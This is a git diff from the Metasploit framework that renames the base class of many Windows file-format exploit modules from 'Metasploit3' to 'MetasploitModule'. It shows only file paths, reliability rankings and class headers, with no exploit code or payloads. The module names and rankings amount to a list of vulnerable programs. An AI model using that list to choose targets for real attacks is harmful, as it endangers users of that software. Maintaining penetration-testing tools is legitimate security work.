Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb index 171aa77b96..4e643c9134 100644 --- a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb +++ b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb index 74c7b8f7ea..27a7399113 100644 --- a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb +++ b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb index 76ce8452b6..81e7b4eb61 100644 --- a/modules/exploits/windows/fileformat/deepburner_path.rb +++ b/modules/exploits/windows/fileformat/deepburner_path.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/destinymediaplayer16.rb b/modules/exploits/windows/fileformat/destinymediaplayer16.rb index 3535ec9342..e28c56775c 100644 --- a/modules/exploits/windows/fileformat/destinymediaplayer16.rb +++ b/modules/exploits/windows/fileformat/destinymediaplayer16.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb index dde740dc05..5b4ab37f1d 100644 --- a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb +++ b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb index ae6179ce9b..a23ea2c2ba 100644 --- a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb +++ b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/djvu_imageurl.rb b/modules/exploits/windows/fileformat/djvu_imageurl.rb index 1a4afb7f65..bb7f07e4d6 100644 --- a/modules/exploits/windows/fileformat/djvu_imageurl.rb +++ b/modules/exploits/windows/fileformat/djvu_imageurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb index 284effe31b..abf972e0bd 100644 --- a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb +++ b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb index 5e22d75d04..cb3d17c4bf 100644 --- a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb +++ b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb index 48e04da124..9ebe304e14 100644 --- a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb +++ b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb index f63cae9376..3922c36d9f 100644 --- a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb +++ b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb index d1d7450d78..42a7a7b919 100644 --- a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb +++ b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb index c455d9abe3..e7c7606b63 100644 --- a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb +++ b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/etrust_pestscan.rb b/modules/exploits/windows/fileformat/etrust_pestscan.rb index 0985e0c229..f54e0fb9fb 100644 --- a/modules/exploits/windows/fileformat/etrust_pestscan.rb +++ b/modules/exploits/windows/fileformat/etrust_pestscan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb index e13df2b8f0..8d41735dfb 100644 --- a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb +++ b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/fatplayer_wav.rb b/modules/exploits/windows/fileformat/fatplayer_wav.rb index 38686df93b..cf4f18cd37 100644 --- a/modules/exploits/windows/fileformat/fatplayer_wav.rb +++ b/modules/exploits/windows/fileformat/fatplayer_wav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/fdm_torrent.rb b/modules/exploits/windows/fileformat/fdm_torrent.rb index df64e35035..835441a161 100644 --- a/modules/exploits/windows/fileformat/fdm_torrent.rb +++ b/modules/exploits/windows/fileformat/fdm_torrent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/feeddemon_opml.rb b/modules/exploits/windows/fileformat/feeddemon_opml.rb index fd9a115fca..e19d9777bf 100644 --- a/modules/exploits/windows/fileformat/feeddemon_opml.rb +++ b/modules/exploits/windows/fileformat/feeddemon_opml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb index f5da05ca0a..4959c496fb 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb index 1f9be2a724..d008307d25 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_launch.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/foxit_title_bof.rb b/modules/exploits/windows/fileformat/foxit_title_bof.rb index 166a9cfee8..9c9f4b3566 100644 --- a/modules/exploits/windows/fileformat/foxit_title_bof.rb +++ b/modules/exploits/windows/fileformat/foxit_title_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb index 9be4a7dc85..fa349236e9 100644 --- a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb +++ b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb index 7e82c08be2..144a54e9d9 100644 --- a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb +++ b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/gsm_sim.rb b/modules/exploits/windows/fileformat/gsm_sim.rb index e2019f38cc..0fd7b4a82e 100644 --- a/modules/exploits/windows/fileformat/gsm_sim.rb +++ b/modules/exploits/windows/fileformat/gsm_sim.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/gta_samp.rb b/modules/exploits/windows/fileformat/gta_samp.rb index 8fda60248c..99bfd109cf 100644 --- a/modules/exploits/windows/fileformat/gta_samp.rb +++ b/modules/exploits/windows/fileformat/gta_samp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb index 541f6ac734..e0474ff8d1 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb index b7cb7a9e32..463ee9ac5b 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb index 24ae5f20f2..a04c30b281 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb index dd83c0b103..be882ba496 100644 --- a/modules/exploits/windows/fileformat/homm3_h3m.rb +++ b/modules/exploits/windows/fileformat/homm3_h3m.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb index 468b74316a..2d4cb835fd 100644 --- a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb +++ b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb index b4ed4d9963..8ee1a341ad 100644 --- a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb +++ b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include REXML diff --git a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb index 9040c45a16..6905619ea8 100644 --- a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb +++ b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # ASLR+DEP bypass include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/icofx_bof.rb b/modules/exploits/windows/fileformat/icofx_bof.rb index 0d4f157193..4d4902d9a8 100644 --- a/modules/exploits/windows/fileformat/icofx_bof.rb +++ b/modules/exploits/windows/fileformat/icofx_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb index 6e76f51aff..1efe2accc1 100644 --- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/iftp_schedule_bof.rb b/modules/exploits/windows/fileformat/iftp_schedule_bof.rb index 29df9fcdd0..335af1186d 100644 --- a/modules/exploits/windows/fileformat/iftp_schedule_bof.rb +++ b/modules/exploits/windows/fileformat/iftp_schedule_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb index aebb884c39..4ef262a804 100644 --- a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb +++ b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb b/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb index 55699fcecf..846839bfb1 100644 --- a/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb +++ b/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb b/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb index 4bc326cf3c..844674afc7 100644 --- a/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb +++ b/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/lattice_pac_bof.rb b/modules/exploits/windows/fileformat/lattice_pac_bof.rb index 7af09b6327..5f3157ad99 100644 --- a/modules/exploits/windows/fileformat/lattice_pac_bof.rb +++ b/modules/exploits/windows/fileformat/lattice_pac_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb index 2c46655a13..6b492c5605 100644 --- a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb +++ b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb index aaaa68e5e4..969b09a005 100644 --- a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb +++ b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb index a210a5ddad..498f91f7c3 100644 --- a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb +++ b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb index 41af41ef90..666403ab78 100644 --- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb +++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mediacoder_m3u.rb b/modules/exploits/windows/fileformat/mediacoder_m3u.rb index 9a91b041e3..63947ef024 100644 --- a/modules/exploits/windows/fileformat/mediacoder_m3u.rb +++ b/modules/exploits/windows/fileformat/mediacoder_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb index e6bf891a76..4e7f05a02a 100644 --- a/modules/exploits/windows/fileformat/mediajukebox.rb +++ b/modules/exploits/windows/fileformat/mediajukebox.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/microp_mppl.rb b/modules/exploits/windows/fileformat/microp_mppl.rb index d2b6298122..b8eac69979 100644 --- a/modules/exploits/windows/fileformat/microp_mppl.rb +++ b/modules/exploits/windows/fileformat/microp_mppl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb index aaa749cc1f..1df34cf54e 100644 --- a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb +++ b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb index 45c708b636..c6ce8282a9 100644 --- a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb +++ b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb index 06133dcc58..08d32e4615 100644 --- a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb index 95dff30b96..b5290628b1 100644 --- a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb index b1d56c8738..abca8b0b9a 100644 --- a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb +++ b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb index 5565d239b8..74a36749a5 100644 --- a/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb index 563806e43f..2227ed7907 100644 --- a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb index 01127ad7e2..8e0efe9bee 100644 --- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb +++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb index 3e903cfb6a..ac9a801ea0 100644 --- a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb +++ b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb index c38c4f6694..54346b5033 100644 --- a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb +++ b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb index 1a7ec7195a..cf2cc7d1fd 100644 --- a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb +++ b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb index a0786b7cfc..24283fda76 100644 --- a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb +++ b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/ole' require 'rex/ole/util' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb index 7e68750c0f..485b6ba9d9 100644 --- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb +++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms12_005.rb b/modules/exploits/windows/fileformat/ms12_005.rb index be1f865651..5a6bc720a1 100644 --- a/modules/exploits/windows/fileformat/ms12_005.rb +++ b/modules/exploits/windows/fileformat/ms12_005.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git 